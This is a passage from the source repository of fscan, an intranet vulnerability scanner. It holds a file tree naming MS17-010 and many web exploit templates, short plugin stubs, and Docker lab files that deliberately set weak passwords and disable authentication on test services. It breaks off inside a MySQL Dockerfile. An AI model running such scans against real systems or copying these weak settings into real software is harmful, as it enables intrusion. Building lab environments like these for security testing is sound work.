├── .github
├── conf
│ └── .goreleaser.yml
└── workflows
│ └── release.yml
├── .gitignore
├── Common
├── Config.go
├── Flag.go
├── Log.go
├── Output.go
├── Parse.go
├── ParseIP.go
├── ParsePort.go
├── Ports.go
├── Proxy.go
├── Types.go
└── i18n.go
├── Core
├── ICMP.go
├── LocalScanner.go
├── PluginUtils.go
├── PortFinger.go
├── PortInfo.go
├── PortScan.go
├── Registry.go
├── Scanner.go
├── ServiceScanner.go
├── WebScanner.go
└── nmap-service-probes.txt
├── LICENSE.txt
├── Plugins
├── ActiveMQ.go
├── Base.go
├── Cassandra.go
├── DCInfo.go
├── DCInfoUnix.go
├── Elasticsearch.go
├── FTP.go
├── FindNet.go
├── IMAP.go
├── Kafka.go
├── LDAP.go
├── LocalInfo.go
├── MS17010-Exp.go
├── MS17010.go
├── MSSQL.go
├── Memcached.go
├── MiniDump.go
├── MiniDumpUnix.go
├── Modbus.go
├── Mongodb.go
├── MySQL.go
├── Neo4j.go
├── NetBIOS.go
├── Oracle.go
├── POP3.go
├── Postgres.go
├── RDP.go
├── RabbitMQ.go
├── Redis.go
├── Rsync.go
├── SMB.go
├── SMB2.go
├── SMTP.go
├── SNMP.go
├── SSH.go
├── SmbGhost.go
├── Telnet.go
├── VNC.go
├── WebPoc.go
└── WebTitle.go
├── README.md
├── README_EN.md
├── TestDocker
├── ActiveMQ
│ ├── Dockerfile
│ ├── README.txt
│ ├── activemq.xml
│ └── users.properties
├── Cassandra
│ └── README.txt
├── Elasticsearch
│ ├── Dockerfile
│ └── README.txt
├── FTP
│ └── README.txt
├── IMAP
│ ├── Dockerfile
│ └── README.txt
├── Kafka
│ ├── README.txt
│ ├── docker-compose.yml
│ └── kafka_jaas.conf
├── LDAP
│ ├── Dockerfile
│ ├── README.txt
│ └── bootstrap.ldif
├── MSSQL
│ ├── Dockerfile
│ └── README.txt
├── Memcached
│ ├── Dockerfile
│ └── README.txt
├── Modbus
│ └── README.txt
├── Mongodb
│ ├── Dockerfile
│ └── README.txt
├── MySQL
│ ├── Dockerfile
│ ├── README.txt
│ └── my.cnf
├── Neo4j
│ ├── Dockerfile
│ └── docker-compose.yml
├── Oracle
│ ├── Dockerfile
│ └── README.txt
├── POP3
│ ├── Dockerfile
│ └── README.txt
├── Postgre
│ ├── Dockerfile
│ └── README.md
├── RabbitMQ
│ ├── Dockerfile
│ └── README.txt
├── Redis
│ ├── Dockerfile
│ ├── README.txt
│ └── redis.conf
├── Rsync
│ ├── Dockerfile
│ └── README.txt
├── SMTP
│ ├── Dockerfile
│ ├── README.txt
│ └── start.sh
├── SNMP
│ ├── Dockerfile
│ └── README.txt
├── SSH
│ ├── Dockerfile
│ └── README.txt
├── Telnet
│ ├── Dockerfile
│ └── README.md
├── Tomcat
│ ├── Dockerfile
│ ├── README.txt
│ ├── context.xml
│ └── tomcat-users.xml
├── VNC
│ ├── Dockerfile
│ ├── README.txt
│ └── supervisord.conf
├── Weblogic
│ ├── Dockerfile
│ ├── README.txt
│ ├── create-domain.py
│ └── start.sh
└── Zabbix
│ └── docker-compose.yml
├── WebScan
├── InfoScan.go
├── WebScan.go
├── info
│ └── Rules.go
├── lib
│ ├── Check.go
│ ├── Client.go
│ ├── Eval.go
│ ├── Shiro.go
│ ├── http.pb.go
│ └── http.proto
└── pocs
│ ├── 74cms-sqli-1.yml
│ ├── 74cms-sqli-2.yml
│ ├── 74cms-sqli.yml
│ ├── CVE-2017-7504-Jboss-serialization-RCE.yml
│ ├── CVE-2022-22947.yml
│ ├── CVE-2022-22954-VMware-RCE.yml
│ ├── CVE-2022-26134.yml
│ ├── Hotel-Internet-Manage-RCE.yml
│ ├── Struts2-062-cve-2021-31805-rce.yml
│ ├── active-directory-certsrv-detect.yml
│ ├── activemq-cve-2016-3088.yml
│ ├── activemq-default-password.yml
│ ├── airflow-unauth.yml
│ ├── alibaba-canal-default-password.yml
│ ├── alibaba-canal-info-leak.yml
│ ├── alibaba-nacos-v1-auth-bypass.yml
│ ├── alibaba-nacos.yml
│ ├── amtt-hiboss-server-ping-rce.yml
│ ├── apache-ambari-default-password.yml
│ ├── apache-axis-webservice-detect.yml
│ ├── apache-druid-cve-2021-36749.yml
│ ├── apache-flink-upload-rce.yml
│ ├── apache-httpd-cve-2021-40438-ssrf.yml
│ ├── apache-httpd-cve-2021-41773-path-traversal.yml
│ ├── apache-httpd-cve-2021-41773-rce.yml
│ ├── apache-kylin-unauth-cve-2020-13937.yml
│ ├── apache-nifi-api-unauthorized-access.yml
│ ├── apache-ofbiz-cve-2018-8033-xxe.yml
│ ├── apache-ofbiz-cve-2020-9496-xml-deserialization.yml
│ ├── aspcms-backend-leak.yml
│ ├── backup-file.yml
│ ├── bash-cve-2014-6271.yml
│ ├── bt742-pma-unauthorized-access.yml
│ ├── cacti-weathermap-file-write.yml
│ ├── chinaunicom-modem-default-password.yml
│ ├── cisco-cve-2020-3452-readfile.yml
│ ├── citrix-cve-2019-19781-path-traversal.yml
│ ├── citrix-cve-2020-8191-xss.yml
│ ├── citrix-cve-2020-8193-unauthorized.yml
│ ├── citrix-xenmobile-cve-2020-8209.yml
│ ├── coldfusion-cve-2010-2861-lfi.yml
│ ├── confluence-cve-2015-8399.yml
│ ├── confluence-cve-2019-3396-lfi.yml
│ ├── confluence-cve-2021-26084.yml
│ ├── confluence-cve-2021-26085-arbitrary-file-read.yml
│ ├── consul-rexec-rce.yml
│ ├── consul-service-rce.yml
│ ├── coremail-cnvd-2019-16798.yml
│ ├── couchcms-cve-2018-7662.yml
│ ├── couchdb-cve-2017-12635.yml
│ ├── couchdb-unauth.yml
│ ├── craftcms-seomatic-cve-2020-9757-rce.yml
│ ├── datang-ac-default-password-cnvd-2021-04128.yml
│ ├── dedecms-carbuyaction-fileinclude.yml
│ ├── dedecms-cve-2018-6910.yml
│ ├── dedecms-cve-2018-7700-rce.yml
│ ├── dedecms-guestbook-sqli.yml
│ ├── dedecms-membergroup-sqli.yml
│ ├── dedecms-url-redirection.yml
│ ├── discuz-ml3x-cnvd-2019-22239.yml
│ ├── discuz-v72-sqli.yml
│ ├── discuz-wechat-plugins-unauth.yml
│ ├── discuz-wooyun-2010-080723.yml
│ ├── django-CVE-2018-14574.yml
│ ├── dlink-850l-info-leak.yml
│ ├── dlink-cve-2019-16920-rce.yml
│ ├── dlink-cve-2019-17506.yml
│ ├── dlink-cve-2020-25078-account-disclosure.yml
│ ├── dlink-cve-2020-9376-dump-credentials.yml
│ ├── dlink-dsl-2888a-rce.yml
│ ├── docker-api-unauthorized-rce.yml
│ ├── docker-registry-api-unauth.yml
│ ├── dotnetcms-sqli.yml
│ ├── draytek-cve-2020-8515.yml
│ ├── druid-monitor-unauth.yml
│ ├── drupal-cve-2014-3704-sqli.yml
│ ├── drupal-cve-2018-7600-rce.yml
│ ├── drupal-cve-2019-6340.yml
│ ├── dubbo-admin-default-password.yml
│ ├── duomicms-sqli.yml
│ ├── dvr-cve-2018-9995.yml
│ ├── e-office-v10-sql-inject.yml
│ ├── e-office-v9-upload-cnvd-2021-49104.yml
│ ├── e-zkeco-cnvd-2020-57264-read-file.yml
│ ├── ecology-arbitrary-file-upload.yml
│ ├── ecology-filedownload-directory-traversal.yml
│ ├── ecology-javabeanshell-rce.yml
│ ├── ecology-springframework-directory-traversal.yml
│ ├── ecology-syncuserinfo-sqli.yml
│ ├── ecology-v8-sqli.yml
│ ├── ecology-validate-sqli.yml
│ ├── ecology-workflowcentertreedata-sqli.yml
│ ├── ecology-workflowservicexml.yml
│ ├── ecshop-cnvd-2020-58823-sqli.yml
│ ├── ecshop-collection-list-sqli.yml
│ ├── ecshop-login-sqli.yml
│ ├── ecshop-rce.yml
│ ├── eea-info-leak-cnvd-2021-10543.yml
│ ├── elasticsearch-cve-2014-3120.yml
│ ├── elasticsearch-cve-2015-1427.yml
│ ├── elasticsearch-cve-2015-3337-lfi.yml
│ ├── elasticsearch-cve-2015-5531.yml
│ ├── elasticsearch-unauth.yml
│ ├── etcd-unauth.yml
│ ├── etcd-v3-unauth.yml
│ ├── etouch-v2-sqli.yml
│ ├── exchange-cve-2021-26855-ssrf.yml
│ ├── eyou-rce.yml
│ ├── ezoffice-dpwnloadhttp.jsp-filedownload.yml
│ ├── f5-cve-2021-22986.yml
│ ├── f5-cve-2022-1388.yml
│ ├── f5-tmui-cve-2020-5902-rce.yml
│ ├── fangweicms-sqli.yml
│ ├── fckeditor-info.yml
│ ├── feifeicms-lfr.yml
│ ├── finecms-sqli.yml
│ ├── finereport-directory-traversal.yml
│ ├── finereport-v8-arbitrary-file-read.yml
│ ├── flexpaper-cve-2018-11686.yml
│ ├── flink-jobmanager-cve-2020-17519-lfi.yml
│ ├── fortigate-cve-2018-13379-readfile.yml
│ ├── frp-dashboard-unauth.yml
│ ├── gateone-cve-2020-35736.yml
│ ├── gilacms-cve-2020-5515.yml
│ ├── gitlab-graphql-info-leak-cve-2020-26413.yml
│ ├── gitlab-ssrf-cve-2021-22214.yml
│ ├── gitlist-rce-cve-2018-1000533.yml
│ ├── glassfish-cve-2017-1000028-lfi.yml
│ ├── go-pprof-leak.yml
│ ├── gocd-cve-2021-43287.yml
│ ├── h2-database-web-console-unauthorized-access.yml
│ ├── h3c-imc-rce.yml
│ ├── h3c-secparh-any-user-login.yml
│ ├── h5s-video-platform-cnvd-2020-67113-unauth.yml
│ ├── hadoop-yarn-unauth.yml
│ ├── hanming-video-conferencing-file-read.yml
│ ├── harbor-cve-2019-16097.yml
│ ├── hikvision-cve-2017-7921.yml
│ ├── hikvision-gateway-data-file-read.yml
│ ├── hikvision-info-leak.yml
│ ├── hikvision-intercom-service-default-password.yml
│ ├── hikvision-showfile-file-read.yml
│ ├── hikvision-unauthenticated-rce-cve-2021-36260.yml
│ ├── hjtcloud-arbitrary-fileread.yml
│ ├── hjtcloud-directory-file-leak.yml
│ ├── huawei-home-gateway-hg659-fileread.yml
│ ├── ifw8-router-cve-2019-16313.yml
│ ├── iis-put-getshell.yml
│ ├── influxdb-unauth.yml
│ ├── inspur-tscev4-cve-2020-21224-rce.yml
│ ├── jboss-cve-2010-1871.yml
│ ├── jboss-unauth.yml
│ ├── jeewms-showordownbyurl-fileread.yml
│ ├── jellyfin-file-read-cve-2021-21402.yml
│ ├── jenkins-cve-2018-1000600.yml
│ ├── jenkins-cve-2018-1000861-rce.yml
│ ├── jenkins-unauthorized-access.yml
│ ├── jetty-cve-2021-28164.yml
│ ├── jira-cve-2019-11581.yml
│ ├── jira-cve-2019-8442.yml
│ ├── jira-cve-2019-8449.yml
│ ├── jira-cve-2020-14179.yml
│ ├── jira-cve-2020-14181.yml
│ ├── jira-ssrf-cve-2019-8451.yml
│ ├── joomla-cnvd-2019-34135-rce.yml
│ ├── joomla-component-vreview-sql.yml
│ ├── joomla-cve-2015-7297-sqli.yml
│ ├── joomla-cve-2017-8917-sqli.yml
│ ├── joomla-cve-2018-7314-sql.yml
│ ├── joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml
│ ├── jumpserver-unauth-rce.yml
│ ├── jupyter-notebook-unauthorized-access.yml
│ ├── kafka-manager-unauth.yml
│ ├── kibana-cve-2018-17246.yml
│ ├── kibana-unauth.yml
│ ├── kingdee-eas-directory-traversal.yml
│ ├── kingsoft-v8-default-password.yml
│ ├── kingsoft-v8-file-read.yml
│ ├── kong-cve-2020-11710-unauth.yml
│ ├── kubernetes-unauth.yml
│ ├── kyan-network-monitoring-account-password-leakage.yml
│ ├── landray-oa-custom-jsp-fileread.yml
│ ├── lanproxy-cve-2021-3019-lfi.yml
│ ├── laravel-cve-2021-3129.yml
│ ├── laravel-debug-info-leak.yml
│ ├── laravel-improper-webdir.yml
│ ├── maccms-rce.yml
│ ├── maccmsv10-backdoor.yml
│ ├── metinfo-cve-2019-16996-sqli.yml
│ ├── metinfo-cve-2019-16997-sqli.yml
│ ├── metinfo-cve-2019-17418-sqli.yml
│ ├── metinfo-file-read.yml
│ ├── metinfo-lfi-cnvd-2018-13393.yml
│ ├── minio-default-password.yml
│ ├── mongo-express-cve-2019-10758.yml
│ ├── mpsec-isg1000-file-read.yml
│ ├── msvod-sqli.yml
│ ├── myucms-lfr.yml
│ ├── nagio-cve-2018-10735.yml
│ ├── nagio-cve-2018-10736.yml
│ ├── nagio-cve-2018-10737.yml
│ ├── nagio-cve-2018-10738.yml
│ ├── natshell-arbitrary-file-read.yml
│ ├── netentsec-icg-default-password.yml
│ ├── netentsec-ngfw-rce.yml
│ ├── netgear-cve-2017-5521.yml
│ ├── nextjs-cve-2017-16877.yml
│ ├── nexus-cve-2019-7238.yml
│ ├── nexus-cve-2020-10199.yml
│ ├── nexus-cve-2020-10204.yml
│ ├── nexus-default-password.yml
│ ├── nexusdb-cve-2020-24571-path-traversal.yml
│ ├── nhttpd-cve-2019-16278.yml
│ ├── node-red-dashboard-file-read-cve-2021-3223.yml
│ ├── novnc-url-redirection-cve-2021-3654.yml
│ ├── nps-default-password.yml
│ ├── ns-asg-file-read.yml
│ ├── nsfocus-uts-password-leak.yml
│ ├── nuuo-file-inclusion.yml
│ ├── odoo-file-read.yml
│ ├── openfire-cve-2019-18394-ssrf.yml
│ ├── opentsdb-cve-2020-35476-rce.yml
│ ├── panabit-gateway-default-password.yml
│ ├── panabit-ixcache-default-password.yml
│ ├── pandorafms-cve-2019-20224-rce.yml
│ ├── pbootcms-database-file-download.yml
│ ├── php-cgi-cve-2012-1823.yml
│ ├── phpcms-cve-2018-19127.yml
│ ├── phpmyadmin-cve-2018-12613-file-inclusion.yml
│ ├── phpmyadmin-setup-deserialization.yml
│ ├── phpok-sqli.yml
│ ├── phpshe-sqli.yml
│ ├── phpstudy-backdoor-rce.yml
│ ├── phpstudy-nginx-wrong-resolve.yml
│ ├── phpunit-cve-2017-9841-rce.yml
│ ├── powercreator-arbitrary-file-upload.yml
│ ├── prometheus-url-redirection-cve-2021-29622.yml
│ ├── pulse-cve-2019-11510.yml
│ ├── pyspider-unauthorized-access.yml
│ ├── qibocms-sqli.yml
│ ├── qilin-bastion-host-rce.yml
│ ├── qizhi-fortressaircraft-unauthorized.yml
│ ├── qnap-cve-2019-7192.yml
│ ├── rabbitmq-default-password.yml
│ ├── rails-cve-2018-3760-rce.yml
│ ├── razor-cve-2018-8770.yml
│ ├── rconfig-cve-2019-16663.yml
│ ├── resin-cnnvd-200705-315.yml
│ ├── resin-inputfile-fileread-or-ssrf.yml
│ ├── resin-viewfile-fileread.yml
│ ├── rockmongo-default-password.yml
│ ├── ruijie-eg-cli-rce.yml
│ ├── ruijie-eg-file-read.yml
│ ├── ruijie-eg-info-leak.yml
│ ├── ruijie-eweb-rce-cnvd-2021-09650.yml
│ ├── ruijie-nbr1300g-cli-password-leak.yml
│ ├── ruijie-uac-cnvd-2021-14536.yml
│ ├── ruoyi-management-fileread.yml
│ ├── saltstack-cve-2020-16846.yml
│ ├── saltstack-cve-2021-25282-file-write.yml
│ ├── samsung-wea453e-default-pwd.yml
│ ├── samsung-wea453e-rce.yml
│ ├── samsung-wlan-ap-wea453e-rce.yml
│ ├── sangfor-ad-download.php-filedownload.yml
│ ├── sangfor-ba-rce.yml
│ ├── sangfor-edr-arbitrary-admin-login.yml
│ ├── sangfor-edr-cssp-rce.yml
│ ├── sangfor-edr-tool-rce.yml
│ ├── satellian-cve-2020-7980-rce.yml
│ ├── seacms-before-v992-rce.yml
│ ├── seacms-rce.yml
│ ├── seacms-sqli.yml
│ ├── seacms-v654-rce.yml
│ ├── seacmsv645-command-exec.yml
│ ├── secnet-ac-default-password.yml
│ ├── seeyon-a6-employee-info-leak.yml
│ ├── seeyon-a6-test-jsp-sql.yml
│ ├── seeyon-ajax-unauthorized-access.yml
│ ├── seeyon-cnvd-2020-62422-readfile.yml
│ ├── seeyon-oa-a8-m-information-disclosure.yml
│ ├── seeyon-oa-cookie-leak.yml
│ ├── seeyon-session-leak.yml
│ ├── seeyon-setextno-jsp-sql.yml
│ ├── seeyon-unauthoried.yml
│ ├── seeyon-wooyun-2015-0108235-sqli.yml
│ ├── seeyon-wooyun-2015-148227.yml
│ ├── shiro-key.yml
│ ├── shiziyu-cms-apicontroller-sqli.yml
│ ├── shopxo-cnvd-2021-15822.yml
│ ├── showdoc-default-password.yml
│ ├── showdoc-uploadfile.yml
│ ├── skywalking-cve-2020-9483-sqli.yml
│ ├── solarwinds-cve-2020-10148.yml
│ ├── solr-cve-2017-12629-xxe.yml
│ ├── solr-cve-2019-0193.yml
│ ├── solr-fileread.yml
│ ├── solr-velocity-template-rce.yml
│ ├── sonarqube-cve-2020-27986-unauth.yml
│ ├── sonicwall-ssl-vpn-rce.yml
│ ├── spark-api-unauth.yml
│ ├── spark-webui-unauth.yml
│ ├── spon-ip-intercom-ping-rce.yml
│ ├── spring-actuator-heapdump-file.yml
│ ├── spring-cloud-cve-2020-5405.yml
│ ├── spring-cloud-cve-2020-5410.yml
│ ├── spring-core-rce.yml
│ ├── spring-cve-2016-4977.yml
│ ├── springboot-cve-2021-21234.yml
│ ├── springboot-env-unauth.yml
│ ├── springcloud-cve-2019-3799.yml
│ ├── sql-file.yml
│ ├── struts2-045.yml
│ ├── struts2-046-1.yml
│ ├── supervisord-cve-2017-11610.yml
│ ├── swagger-ui-unauth.yml
│ ├── tamronos-iptv-rce.yml
│ ├── telecom-gateway-default-password.yml
│ ├── tensorboard-unauth.yml
│ ├── terramaster-cve-2020-15568.yml
│ ├── terramaster-tos-rce-cve-2020-28188.yml
│ ├── thinkadmin-v6-readfile.yml
│ ├── thinkcmf-lfi.yml
│ ├── thinkcmf-write-shell.yml
│ ├── thinkphp-v6-file-write.yml
│ ├── thinkphp5-controller-rce.yml
│ ├── thinkphp5023-method-rce.yml
│ ├── tianqing-info-leak.yml
│ ├── tomcat-cve-2017-12615-rce.yml
│ ├── tomcat-cve-2018-11759.yml
│ ├── tomcat-manager-weak.yml
│ ├── tongda-insert-sql-inject.yml
│ ├── tongda-meeting-unauthorized-access.yml
│ ├── tongda-oa-v11.9-api.ali.php-upload.yml
│ ├── tongda-user-session-disclosure.yml
│ ├── tongda-v2017-uploadfile.yml
│ ├── tpshop-directory-traversal.yml
│ ├── tpshop-sqli.yml
│ ├── tvt-nvms-1000-file-read-cve-2019-20085.yml
│ ├── typecho-rce.yml
│ ├── ueditor-cnvd-2017-20077-file-upload.yml
│ ├── uwsgi-cve-2018-7490.yml
│ ├── vbulletin-cve-2019-16759-bypass.yml
│ ├── vbulletin-cve-2019-16759.yml
│ ├── vmware-vcenter-arbitrary-file-read.yml
│ ├── vmware-vcenter-cve-2021-21985-rce.yml
│ ├── vmware-vcenter-unauthorized-rce-cve-2021-21972.yml
│ ├── vmware-vrealize-cve-2021-21975-ssrf.yml
│ ├── weaver-E-Cology-getSqlData-sqli.yml
│ ├── weaver-ebridge-file-read.yml
│ ├── weaver-oa-eoffice-v9-upload-getshell.yml
│ ├── weblogic-console-weak.yml
│ ├── weblogic-cve-2017-10271.yml
│ ├── weblogic-cve-2019-2725.yml
│ ├── weblogic-cve-2019-2729-1.yml
│ ├── weblogic-cve-2019-2729-2.yml
│ ├── weblogic-cve-2020-14750.yml
│ ├── weblogic-ssrf.yml
│ ├── webmin-cve-2019-15107-rce.yml
│ ├── weiphp-path-traversal.yml
│ ├── weiphp-sql.yml
│ ├── wifisky-default-password-cnvd-2021-39012.yml
│ ├── wordpress-cve-2019-19985-infoleak.yml
│ ├── wordpress-ext-adaptive-images-lfi.yml
│ ├── wordpress-ext-mailpress-rce.yml
│ ├── wuzhicms-v410-sqli.yml
│ ├── xdcms-sql.yml
│ ├── xiuno-bbs-cvnd-2019-01348-reinstallation.yml
│ ├── xunchi-cnvd-2020-23735-file-read.yml
│ ├── yapi-rce.yml
│ ├── yccms-rce.yml
│ ├── yonyou-grp-u8-sqli-to-rce.yml
│ ├── yonyou-grp-u8-sqli.yml
│ ├── yonyou-nc-arbitrary-file-upload.yml
│ ├── yonyou-nc-bsh-servlet-bshservlet-rce.yml
│ ├── yonyou-u8-oa-sqli.yml
│ ├── youphptube-encoder-cve-2019-5127.yml
│ ├── youphptube-encoder-cve-2019-5128.yml
│ ├── youphptube-encoder-cve-2019-5129.yml
│ ├── yungoucms-sqli.yml
│ ├── zabbix-authentication-bypass.yml
│ ├── zabbix-cve-2016-10134-sqli.yml
│ ├── zabbix-default-password.yml
│ ├── zcms-v3-sqli.yml
│ ├── zeit-nodejs-cve-2020-5284-directory-traversal.yml
│ ├── zeroshell-cve-2019-12725-rce.yml
│ ├── zimbra-cve-2019-9670-xxe.yml
│ └── zzcms-zsmanage-sqli.yml
├── go.mod
├── go.sum
├── image
├── 1.png
├── 2.0-1.png
├── 2.0-2.png
├── 2.png
├── 2020-12-12-13-34-44.png
├── 3.png
├── 4.png
├── 5.png
├── gpt-4o
│ ├── 4o-1.png
│ ├── 4o-2.png
│ ├── 4o-3.png
│ ├── 4o-4.png
│ ├── 4o-5.png
│ ├── 4o-6.png
│ ├── 4o-7.png
│ ├── 4o-8.png
│ └── final.png
├── live.png
├── netbios.png
├── netbios1.png
└── sponsor.png
└── main.go
/.gitignore:
--------------------------------------------------------------------------------
1 | result.txt
2 | main
3 | .idea
4 | fscan.exe
5 | fscan
6 | makefile
7 | fscanapi.csv
8 |
--------------------------------------------------------------------------------
/Plugins/DCInfoUnix.go:
--------------------------------------------------------------------------------
1 | //go:build !windows
2 |
3 | package Plugins
4 |
5 | import "github.com/shadow1ng/fscan/Common"
6 |
7 | func DCInfoScan(info *Common.HostInfo) (err error) {
8 | return nil
9 | }
10 |
--------------------------------------------------------------------------------
/Plugins/MiniDumpUnix.go:
--------------------------------------------------------------------------------
1 | //go:build !windows
2 |
3 | package Plugins
4 |
5 | import "github.com/shadow1ng/fscan/Common"
6 |
7 | func MiniDump(info *Common.HostInfo) (err error) {
8 | return nil
9 | }
10 |
--------------------------------------------------------------------------------
/Plugins/WebPoc.go:
--------------------------------------------------------------------------------
1 | package Plugins
2 |
3 | import (
4 | "github.com/shadow1ng/fscan/Common"
5 | "github.com/shadow1ng/fscan/WebScan"
6 | )
7 |
8 | // WebPoc 直接执行Web漏洞扫描
9 | func WebPoc(info *Common.HostInfo) error {
10 | if Common.DisablePocScan {
11 | return nil
12 | }
13 | WebScan.WebScan(info)
14 | return nil
15 | }
16 |
--------------------------------------------------------------------------------
/TestDocker/ActiveMQ/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM rmohr/activemq:5.15.9
2 |
3 | # 复制配置文件
4 | COPY users.properties /opt/activemq/conf/users.properties
5 | COPY activemq.xml /opt/activemq/conf/activemq.xml
6 |
7 | # 暴露端口
8 | EXPOSE 61616 61613
9 |
10 | # 设置启动命令
11 | CMD ["/opt/activemq/bin/activemq", "console"]
--------------------------------------------------------------------------------
/TestDocker/ActiveMQ/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t activemq-weak .
2 | docker run -d --name activemq-test -p 61616:61616 -p 8161:8161 -p 61613:61613 activemq-weak
--------------------------------------------------------------------------------
/TestDocker/ActiveMQ/users.properties:
--------------------------------------------------------------------------------
1 | admin=Aa123456789
2 | test=test123
3 | root=root123
4 | system=admin123
--------------------------------------------------------------------------------
/TestDocker/Cassandra/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t cassandra-weak .
2 | docker run -d --name cassandra-test -e CASSANDRA_AUTHENTICATOR=AllowAllAuthenticator -p 9042:9042 -p 9160:9160 cassandra:3.11
--------------------------------------------------------------------------------
/TestDocker/Elasticsearch/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/elasticsearch/elasticsearch:7.9.3
2 |
3 | # 设置环境变量允许单节点运行
4 | ENV discovery.type=single-node
5 |
6 | # 允许任意IP访问
7 | ENV network.host=0.0.0.0
8 |
9 | # 设置弱密码
10 | ENV ELASTIC_PASSWORD=elastic123
11 |
12 | # 暴露端口
13 | EXPOSE 9200 9300
14 |
15 | # 设置默认用户名elastic和密码elastic123
16 | RUN echo 'elastic:elastic123' > /usr/share/elasticsearch/config/users
17 |
18 | # 关闭xpack安全功能,使其可以无认证访问
19 | RUN echo 'xpack.security.enabled: false' >> /usr/share/elasticsearch/config/elasticsearch.yml
--------------------------------------------------------------------------------
/TestDocker/Elasticsearch/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t elastic-test .
2 | docker run -d -p 9200:9200 -p 9300:9300 elastic-test
--------------------------------------------------------------------------------
/TestDocker/FTP/README.txt:
--------------------------------------------------------------------------------
1 | docker run -d -p 20:20 -p 21:21 -e FTP_USER=admin -e FTP_PASS=123456 -e PASV_ADDRESS=127.0.0.1 --name ftp bogem/ftp
2 | Mac上可能有问题
--------------------------------------------------------------------------------
/TestDocker/IMAP/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t weak-imap .
2 | docker run -d --name imap-test -p 143:143 -p 993:993 weak-imap
--------------------------------------------------------------------------------
/TestDocker/Kafka/README.txt:
--------------------------------------------------------------------------------
1 | docker-compose up -d
--------------------------------------------------------------------------------
/TestDocker/Kafka/kafka_jaas.conf:
--------------------------------------------------------------------------------
1 | KafkaServer {
2 | org.apache.kafka.common.security.plain.PlainLoginModule required
3 | username="admin"
4 | password="admin123"
5 | user_admin="admin123"
6 | user_test="test123"
7 | user_kafka="kafka123";
8 | };
--------------------------------------------------------------------------------
/TestDocker/LDAP/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM osixia/openldap:1.5.0
2 |
3 | # 环境变量设置
4 | ENV LDAP_ORGANISATION="Example Inc"
5 | ENV LDAP_DOMAIN="example.com"
6 | ENV LDAP_BASE_DN="dc=example,dc=com"
7 | # 设置一个弱密码
8 | ENV LDAP_ADMIN_PASSWORD="Aa123456789"
9 | # 允许匿名访问
10 | ENV LDAP_READONLY_USER="true"
11 | ENV LDAP_READONLY_USER_USERNAME="readonly"
12 | ENV LDAP_READONLY_USER_PASSWORD="readonly"
13 |
14 | # 暴露端口
15 | EXPOSE 389 636
16 |
17 | # 创建初始化脚本
18 | COPY bootstrap.ldif /container/service/slapd/assets/config/bootstrap/ldif/custom/
--------------------------------------------------------------------------------
/TestDocker/LDAP/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t ldap-weak .
2 | docker run -d --name ldap-test -p 389:389 -p 636:636 ldap-weak
--------------------------------------------------------------------------------
/TestDocker/LDAP/bootstrap.ldif:
--------------------------------------------------------------------------------
1 | dn: ou=users,dc=example,dc=com
2 | objectClass: organizationalUnit
3 | ou: users
4 |
5 | dn: cn=admin,ou=users,dc=example,dc=com
6 | objectClass: inetOrgPerson
7 | cn: admin
8 | sn: admin
9 | uid: admin
10 | userPassword: admin123
11 |
12 | dn: cn=test,ou=users,dc=example,dc=com
13 | objectClass: inetOrgPerson
14 | cn: test
15 | sn: test
16 | uid: test
17 | userPassword: test123
18 |
19 | dn: cn=root,ou=users,dc=example,dc=com
20 | objectClass: inetOrgPerson
21 | cn: root
22 | sn: root
23 | uid: root
24 | userPassword: root123
--------------------------------------------------------------------------------
/TestDocker/MSSQL/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用SQL Server官方镜像
2 | FROM mcr.microsoft.com/mssql/server:2022-latest
3 |
4 | # 设置环境变量
5 | ENV ACCEPT_EULA=Y
6 | ENV MSSQL_SA_PASSWORD=P@ssword123
7 | ENV MSSQL_PID=Express
8 |
9 | # 开放1433端口
10 | EXPOSE 1433
11 |
12 | # 健康检查
13 | HEALTHCHECK --interval=30s --timeout=3s \
14 | CMD /opt/mssql-tools/bin/sqlcmd -S localhost -U sa -P P@ssword123 -Q "SELECT 1" || exit 1
--------------------------------------------------------------------------------
/TestDocker/MSSQL/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t mssql-server .
2 | docker run -d \
3 | -p 1433:1433 \
4 | --name mssql-container \
5 | mssql-server
--------------------------------------------------------------------------------
/TestDocker/Memcached/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用Memcached官方镜像
2 | FROM memcached:latest
3 |
4 | # 开放11211端口
5 | EXPOSE 11211
6 |
7 | # 设置启动参数
8 | # -m 64: 分配64MB内存
9 | # -c 1024: 最大同时连接数1024
10 | # -v: 显示版本信息
11 | CMD ["memcached", "-m", "64", "-c", "1024", "-v"]
--------------------------------------------------------------------------------
/TestDocker/Memcached/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t memcached-server .
2 | docker run -d \
3 | -p 11211:11211 \
4 | --name memcached-container \
5 | memcached-server
--------------------------------------------------------------------------------
/TestDocker/Modbus/README.txt:
--------------------------------------------------------------------------------
1 | docker run --rm -p 5020:5020 oitc/modbus-server:latest
--------------------------------------------------------------------------------
/TestDocker/Mongodb/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用MongoDB官方镜像
2 | FROM mongo:latest
3 |
4 | # 设置环境变量
5 | ENV MONGO_INITDB_ROOT_USERNAME=admin
6 | ENV MONGO_INITDB_ROOT_PASSWORD=123456
7 |
8 | # 开放27017端口
9 | EXPOSE 27017
10 |
11 | # 健康检查
12 | HEALTHCHECK --interval=30s --timeout=3s \
13 | CMD mongosh --eval 'db.runCommand("ping").ok' localhost:27017/test --quiet
--------------------------------------------------------------------------------
/TestDocker/Mongodb/README.txt:
--------------------------------------------------------------------------------
1 | docker build -t mongodb-server .
2 | docker run -d \
3 | -p 27017:27017 \
4 | --name mongodb-container \
5 | mongodb-server
--------------------------------------------------------------------------------
/TestDocker/MySQL/Dockerfile:
--------------------------------------------------------------------------------
1 | # 使用MySQL官方镜像
2 | FROM mysql:latest
3 |
4 | # 设置环境变量
5 | ENV MYSQL_ROOT_PASSWORD=Password
6 | ENV MYSQL_DATABASE=mydb
7 |
8 | # 开放3306端口
9 | EXPOSE 3306
10 |
11 | # MySQL配置
12 | # 允许远程访问
